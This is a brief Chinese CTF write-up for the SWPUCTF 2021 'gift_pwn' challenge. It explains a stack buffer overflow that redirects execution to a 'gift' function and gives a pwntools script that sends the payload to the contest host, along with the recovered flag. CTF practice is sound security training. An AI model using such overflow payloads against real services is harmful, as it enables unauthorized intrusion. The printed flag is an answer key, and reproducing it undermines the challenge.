[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

简介: [SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

按照签到题的套路是找main,buf,shell,bin/sh/,这个是加了一个gift的地址

距离rbp 16字节,我们要再加上我们的8个字节

最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了

from pwn import *
p = remote('node4.anna.nssctf.cn',28325)
payload = b'a' * 0x10 + b'a' * 8 + p64(0x4005b6)
p.send(payload)
p.interactive()

NSSCTF{7b6d2d8a-b6a5-4c40-bcdd-f4604c025219}


目录
相关文章
|
数据安全/隐私保护 Python
BUUCTF [SWPU2019]神奇的二维码 1
BUUCTF [SWPU2019]神奇的二维码 1
953 0
BUUCTF [SWPU2019]神奇的二维码 1
|
JSON PHP 数据格式
[SWPUCTF 2021 新生赛]jicao
[SWPUCTF 2021 新生赛]jicao
841 0
BUUCTF FLAG 1
BUUCTF FLAG 1
1189 0
|
Shell
[NISACTF 2022]ezstack-入土为安的第十四天
[NISACTF 2022]ezstack-入土为安的第十四天
209 0
|
Shell
[NISACTF 2022]ezpie- 入土为安的第十五天
[NISACTF 2022]ezpie- 入土为安的第十五天
307 0
|
安全 Shell PHP
escapeshellarg() 和 escapeshellcmd()
escapeshellarg() 和 escapeshellcmd()
NSS [NISACTF 2022]babyupload
NSS [NISACTF 2022]babyupload
187 0
NSS [SWPUCTF 2021 新生赛]pop
NSS [SWPUCTF 2021 新生赛]pop
215 0
|
SQL Python
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
1414 0
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
|
缓存 PHP
[SWPUCTF 2021 新生赛]Do_you_know_http
[SWPUCTF 2021 新生赛]Do_you_know_http
1090 0